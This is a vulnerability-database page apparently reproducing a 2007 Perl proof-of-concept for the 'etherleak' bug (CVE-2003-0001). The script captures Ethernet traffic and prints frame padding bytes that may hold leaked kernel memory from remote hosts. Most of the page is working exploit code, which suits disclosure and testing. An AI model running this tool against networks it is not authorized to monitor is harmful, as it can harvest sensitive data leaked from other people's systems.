Lucene search
etherleak.txt
This Perl code is responsible for the 'etherleak' bug, which has been a long-standing vulnerability in the Linux kernel. It allows certain ethernet device drivers to pad ethernet frames with unsanitized portions of kernel memory, potentially exposing sensitive information to remote systems
Show more
10
`#!/usr/bin/perl -w
# etherleak, code that has been 5 years coming.
#
# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,
# a vulnerability that would be come known as the 'etherleak' bug. In
# various situations an ethernet frame must be padded to reach a specific
# size or fall on a certain boundary. This task is left up to the driver
# for the ethernet device. The RFCs state that this padding must consist
# of NULLs. The bug is that at the time and still to this day, many device
# drivers do not pad will NULLs, but rather pad with unsanitized portions
# of kernel memory, oftentimes exposing sensitive information to remote
# systems or those savvy enough to coerce their targets to do so.
#
# Proof of this can be found by googling for 'warchild and etherleak', or
# by visiting:
#
# http://lkml.org/lkml/2002/4/27/101
#
# This was ultimately fixed in the Linux kernel, but over time this
# vulnerability reared its head numerous times, but at the core the
# vulnerability was the same as the one I originally published. The most
# public of these was CVE-2003-0001, which was assigned to address an
# official @stake advisory.
#
# This code can be found its most current form at:
#
# http://spoofed.org/files/exploits/etherleak
#
# Jon Hart <[email protected]>, March 2007
#
use strict;
use diagnostics;
use warnings;
use Getopt::Long;
use Net::Pcap;
use NetPacket::Ethernet qw(:ALL);
use NetPacket::IP qw(:ALL);
my %opts = ();
my ($iface, $err, $pcap_t, $pcap_save, $filter_string);
GetOptions( \%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or
die "Unknown option: $!\n" && &usage();
if (defined($opts{'help'})) {
&usage();
exit(0);
}
if (defined($opts{'read'})) {
$pcap_t = Net::Pcap::open_offline($opts{'read'}, \$err);
if (!defined($pcap_t)) {
print("Net::Pcap::open_offline failed: $err\n");
exit 1;
}
} else {
if (defined($opts{'interface'})) {
$iface = $opts{'interface'};
} else {
$iface = Net::Pcap::lookupdev(\$err);
if (defined($err)) {
print(STDERR "lookupdev() failed: $err\n");
exit(1);
} else {
print(STDERR "No interface specified. Using $iface\n");
}
}
$pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \$err);
if (!defined($pcap_t)) {
print("Net::Pcap::open_live failed on $iface: $err\n");
exit 1;
}
}
my $filter;
if (Net::Pcap::compile($pcap_t, \$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) {
printf("Net::Pcap::compile failed: %s\n", Net::Pcap::geterr($pcap_t));
exit(1);
}
if (Net::Pcap::setfilter($pcap_t, $filter) == -1) {
printf("Net::Pcap::setfilter failed: %s\n", Net::Pcap::geterr($pcap_t));
exit(1);
}
if (defined($opts{'write'})) {
$pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});
if (!defined($pcap_save)) {
printf("Net::Pcap::dump_open failed: %s\n", Net::Pcap::geterr($pcap_t));
exit(1);
}
}
Net::Pcap::loop($pcap_t, -1, \&process, "foo");
Net::Pcap::close($pcap_t);
if (defined($opts{'write'})) {
Net::Pcap::dump_close($pcap_save);
}
sub process {
my ($user, $hdr, $pkt) = @_;
my ($link, $ip);
my $jump = 0;
my $datalink = Net::Pcap::datalink($pcap_t);
if ($datalink == 1) { $jump += 14; }
elsif ($datalink == 113) { $jump += 16; }
else { printf("Skipping datalink $datalink\n"); return; }
my $l2 = NetPacket::Ethernet->decode($pkt);
if ($l2->{type} == ETH_TYPE_IP) {
$ip = NetPacket::IP->decode(eth_strip($pkt));
$jump += $ip->{len};
} elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }
else {
# assume 802.3 ethernet, and just jump ahead the length
for ($l2->{dest_mac}) {
if (/^0180c200/) {
# spanning tree
# l2->{type} here will actually be the length. HACK.
$jump += $l2->{type};
}
elsif (/^01000ccccc/) {
# CDP/VTP/DTP/PAgP/UDLD/PVST, etc
# l2->{type} here will actually be the length. HACK.
$jump += $l2->{type};
} elsif (/^ab0000020000/) {
# DEC-MOP-Remote-Console
return;
} else {
# loopback
if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }
printf("Skipping datalink $datalink l2 type %s\n", $l2->{type}); return;
}
}
}
if ($hdr->{len} > $jump) {
my $trailer_bin = substr($pkt, $jump);
my $trailer_hex = "";
my $trailer_ascii = "";
foreach (split(//, $trailer_bin)) {
$trailer_hex .= sprintf("%02x", ord($_));
if (ord($_) >= 32 && ord($_) <= 126) {
$trailer_ascii .= $_;
} else { $trailer_ascii .= "."; }
}
# ignore all trailers that are just single characters repeated.
# most OS' use 0, F, 5 or a.
unless ($trailer_hex =~ /^(0|5|f|a)\1*$/i) {
unless ($opts{'quiet'}) {
print("#"x80, "\n");
printf("%s -> %s\n", $l2->{src_mac}, $l2->{dest_mac});
if ($l2->{type} == ETH_TYPE_IP) {
printf("%s -> %s\n", $ip->{src_ip}, $ip->{dest_ip});
}
}
print("$trailer_hex\t$trailer_ascii\n");
if (defined($opts{'write'})) {
Net::Pcap::dump($pcap_save, $hdr, $pkt);
}
}
}
}
sub usage {
print <<EOF;
$0 -- A demonstration of the infamous 'etherleak' bug.
CVE-2003-0001, and countless repeats of the same vulnerability.
Options:
[-h|--help] # this message
[-i|--interface] <interface> # interface to listen on
[-f|--filter] <pcap filter> # apply this filter to the traffic
[-r|--read] <path to pcap> # read from this saved pcap file
[-w|--write] <path to pcap> # write tothis saved pcap file
[-q|--quiet] # be quiet
[-v|--verbose] # be verbose
EOF
}
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo24 Mar 2007 00:00Current
5.1Medium risk
Vulners AI Score5.1
EPSS0.01617